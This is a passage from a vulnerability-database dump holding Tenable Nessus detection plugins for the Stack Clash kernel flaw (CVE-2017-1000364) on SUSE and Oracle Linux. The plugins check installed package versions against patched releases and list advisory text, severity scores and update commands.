["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1905-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1905-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101885);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1905-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_57 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1017589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171905-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e862670\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1178=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1178=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_57-default-7-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_57-xen-7-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:32", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2017-3587 advisory.\n\n - An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be jumped over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010). (CVE-2017-1000364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-06-29T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3587)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-94.3.7.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-94.3.7.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2017-3587.NASL", "href": "https://www.tenable.com/plugins/nessus/101098", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3587.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101098);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2017-1000364\");\n script_xref(name:\"IAVB\", value:\"2017-B-0075\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3587)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2017-3587 advisory.\n\n - An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page\n is not sufficiently large and can be jumped over (the stack guard page is bypassed), this affects Linux\n Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010). (CVE-2017-1000364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2017-3587.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-94.3.7.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-94.3.7.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['4.1.12-94.3.7.el6uek', '4.1.12-94.3.7.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2017-3587');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '4.1';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-4.1.12-94.3.7.el6uek-0.6.0-4.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-94.3.7.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-94.3.7.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-94.3.7.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-94.3.7.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-94.3.7.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-94.3.7.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'},\n {'reference':'dtrace-modules-4.1.12-94.3.7.el7uek-0.6.0-4.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-4.1.12-94.3.7.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-4.1.12'},\n {'reference':'kernel-uek-debug-4.1.12-94.3.7.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-94.3.7.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-94.3.7.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-94.3.7.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-94.3.7.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-4.1.12-94.3.7.el6uek / dtrace-modules-4.1.12-94.3.7.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:32", "description": "This Linux kernel update for SUSE Linux Enterprise 12 SP2 fixes the following issues :\n\n - A previous security update to address CVE-2017-1000364 caused unintended side-effects in several other tools, most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-29T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:1707-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-syms", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1707-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101106", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1707-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101106);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:1707-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 12 SP2 fixes the\nfollowing issues :\n\n - A previous security update to address CVE-2017-1000364\n caused unintended side-effects in several other tools,\n most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171707-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3762ce9b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1058=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1058=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1058=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1058=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-1058=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-1058=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1058=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-1058=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-debuginfo-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.59-92.24.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", 